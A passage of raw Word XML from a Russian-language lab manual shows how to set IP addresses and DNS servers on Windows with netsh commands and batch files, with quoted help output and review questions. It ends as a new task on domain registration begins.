      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Беспроводное сетевое соединение</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Команда выглядит следующим образом:</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497"/>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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>C:\Windows\system32&gt;netsh interface ip set address help Использование: set address [name=]&lt;строка&gt; [[source=]dhcp|static] [[address=]&lt;IPv4-адрес&gt;[/&lt;целое_число&gt;] [[mask=]&lt;IPv4-маска&gt;] [[gateway=]&lt;IPv4-адрес&gt;|none [gwmetric=]&lt;целое_число&gt;] [[type=]unicast|anycast] [[subinterface=]&lt;строка&gt;] [[store=]active|persistent] Параметры: Тег Значение name - имя или индекс интерфейса. source - одно из следующих значений: dhcp: включение DHCP для настройки IP-адресов для указанного интерфейса. static: отключение использования DHCP для настройки IP-адресов для указанного интерфейса. Это значение указывается при настройке адреса или шлюза. address - добавляемый или изменяемый IPv4-адрес, за которым может следовать длина префикса подсети. mask - маска подсети IP для указанного IP-адреса. gateway - одно из следующих значений: &lt;IPv4-адрес&gt;: определенный шлюз по умолчанию для задаваемого статического IP-адреса. none: шлюзы по умолчанию не задаются. Этот параметр используется по умолчанию. gwmetric - метрика шлюза по умолчанию. Это поле следует задавать только тогда, когда указан шлюз. type - одно из следующих значений: unicast: адрес задается как адрес одноадресной рассылки. Этот параметр используется по умолчанию. anycast: адрес задается как адрес произвольной рассылки. subinterface - LUID подчиненного интерфейса, на котором существует шлюз по умолчанию. Этот параметр требуется только для интерфейсов с несколькими подчиненными интерфейсами. store - одно из следующих значений: active: параметр действует только до следующей загрузки. persistent: постоянный параметр. Этот параметр используется по умолчанию. Примечания: используется для включения или отключения DHCP для настройки IP-адресов. При этом также удаляются любые предыдущие статические IP-адреса и шлюзы по умолчанию или могут быть заданы новые статические IP-адреса и шлюзы по умолчанию. Примеры</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>: set address name=</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area Connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> source=dhcp set address </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> static 10.0.0.9 255.0.0.0 10.0.0.1 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Из этого описания хорошо видно, как использовать данную команду. Замечу, что все параметры кроме name необязательны и их можно не указывать. В частности это полезно, если вы не хотите задавать шлюз или метрику.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Пример 1. Задать автоматическое получение IP-параметров по протоколу DHCP для адаптера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497"/>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rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>netsh interface ip set address name=</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source=dhcp или netsh interface ip set address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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 2. Задать статические IP-параметры для адаптера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 xml:space="preserve"> IP-адрес 213.108.211.11 с маской подсети 255.255.255.240 и шлюзом 213.108.211.10:</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497"/>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netsh interface ip set address name=</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source=static address=213.108.211.11 mask=255.255.255.240 gateway=213.108.211.10 или netsh interface ip set address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static 213.108.211.11 255.255.255.240 213.108.211.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Команда выглядит следующим образом:</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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>C:\Windows\system32&gt;netsh interface ip set dnsservers help Применение: set dnsservers [name=]&lt;строка&gt; [source=]dhcp|static [[address=]&lt;IP-адрес&gt;|none] [[register=]none|primary|both] [[validate=]yes|no] Параметры Тег Значение name - Имя или индекс интерфейса. source - Одно из следующих значений: dhcp: назначает DHCP в качестве источника конфигурации DNS-серверов для определенного интерфейса. static: назначает в качестве источника конфигурации DNS-серверов локальную статическую конфигурацию. address - Одно из следующих значений: &lt;IP-адрес&gt;: IP-адрес DNS-сервера. none: очищает список DNS-серверов. register - Одно из следующих значений: none: отключает динамическую регистрацию DNS. primary: регистрация только с суффиксом основного DNS. both: регистрация как с суффиксом основного DNS, так и с суффиксом, определенным для подключения. validate - Указывает, выполняется ли проверка после настройки параметров DNS-сервера. Значение по умолчанию: yes.  Примечания. Задает в конфигурации DNS-сервера режим DHCP или статический режим. Параметр addr будет доступен для конфигурации статического списка IP-адресов DNS-серверов для указанного интерфейса только при установке источником static. Если значение параметра Validate равно yes, то новый DNS-сервер проверяется. Примеры</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> set dnsservers name=</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area Connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> source=dhcp set dnsservers </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area Connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> static 10.0.0.1 primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В сети гуляет подавляющее большинство описаний, где вместо dnsservers указывается dns. Это устаревший параметр, который оставлен для совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 1. Задать автоматическое получение параметров DNS-сервера по протоколу DHCP для адаптера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netsh interface ip set dnsserver name=</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source=dhcp или netsh interface ip set dnsserver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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 2. Задать статические параметры DNS-сервера для адаптера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 где первый DNS-сервер имеет IP-адрес 213.108.208.2, а второй 213.108.209.2:</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netsh interface ip set dnsservers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static 213.108.208.2 netsh interface ip add dnsservers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213.108.209.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обратите внимание, что команда set dnsservers сбрасывает список DNS-серверов для выбранного сетевого адаптера и устанавливает первый DNS-сервер в указанное значение. Последующие DNS-сервера добавляются через команду add вместо set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какие еще параметры можно изменять</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Смотрим на вывод команды</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C:\Windows\system32&gt;netsh interface ip set help Применимы следующие команды: Команды в этом контексте: set address - Задает статический IP-адрес или основной шлюз для интерфейса. set compartment - Изменяет параметры конфигурации секции. set dnsservers - Установка режима DNS-сервера и адресов. set dynamicportrange - Изменяет диапазон портов, используемый для динамического назначения портов. set global - Изменяет общие параметры глобальной конфигурации. set interface - Изменяет параметры конфигурации интерфейса для IP. set neighbors - Задает адрес соседа. set route - Изменяет параметры маршрута. set subinterface - Изменяет параметры конфигурации субинтерфейса. </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>set winsservers - Установка режима WINS-сервера и адресов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Поскольку большинство этих параметров (кроме IP-адреса и DNS-сервера) большинству смертных не потребуется, то и описывать я их не стану. Но Вы всегда сможете получить справку по нужным параметрам, используя за образец команды выше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый раз вводить команды очень утомительно. Поэтому лучше создать файл с расширением </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или более устаревший вариант </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), где эти команды будут записаны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример 1. Применение сетевых настроек по протоколу DHCP:</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netsh interface ip set address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 netsh interface ip set dnsserver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 pause</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример 2. Применение статических сетевых настроек:</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netsh interface ip set address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static 213.108.213.117 255.255.255.240 213.108.213.113 netsh interface ip set dnsservers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static 213.108.208.2 netsh interface ip add dnsservers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213.108.209.2 pause</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Команда pause в конце скрипта не позволяет закрыться окну. Это важно, если Вы допустили ошибки при наборе команды. Когда команды написаны правильно команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pause</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно удалить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>! В локализованных версиях Windows имена сетевых адаптеров написаны на русском языке. Символы кириллицы имеют различные кодовые страницы для Windows-приложений (обычно, графических) и приложений в командной строке. Поэтому важно сохранить файл с командами в кодировке CP866. (Стандартный блокнот не позволяет это сделать.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как вариант можно изменить названия сетевых адаптеров с использованием букв латинского алфавита, просто переименовав их:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1795350" cy="1406302"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="236" name="Рисунок 27725" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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25" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image252.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId226" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1794879" cy="1405933"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Например, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cable</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Тогда проблем с кодировками не будет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как было отмечено выше, командные файлы следует запускать под пользователем с правами администратора. Самый простой способ: нажать правой кнопкой на командном файле и выбрать </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запуск от имени администратора</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое командная строка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Как вызвать командную строку?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какая команда выводит основную информацию по сетевым подключениям?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="001B566C" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc507788528"/>
      <w:bookmarkStart w:id="112" w:name="_Toc507788253"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00B758A3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление и решение проблем входа в систему: регистрация компьютера в домене.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
